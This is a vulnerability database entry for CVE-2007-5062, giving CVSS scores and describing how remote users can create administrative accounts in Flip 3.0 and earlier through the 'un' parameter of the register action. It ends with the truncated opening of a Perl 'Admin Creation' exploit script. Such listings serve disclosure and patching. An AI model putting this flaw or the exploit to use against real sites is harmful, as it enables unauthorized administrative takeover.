7.5
CVSSv2

CVE-2007-5062

Published: 24/09/2007 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

account.php in Adam Scheinberg Flip 3.0 and previous versions allows remote malicious users to create administrative accounts via the un parameter in a register action.

Vulnerable Product Search on Vulmon Subscribe to Product

adam scheinberg flip

Exploits

#!/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip <= 30"; my $type = "Admin Creation"; my $author = "undefined1_"; my $vendor = "sourceforgenet/projects/flipsource"; my %opt; getopts("t:", \%opt); $| = 1; print ":: $app $type - by $author - wwwundef1com ::\n\n\n"; my $url = $opt{t} || usage(); if($url ...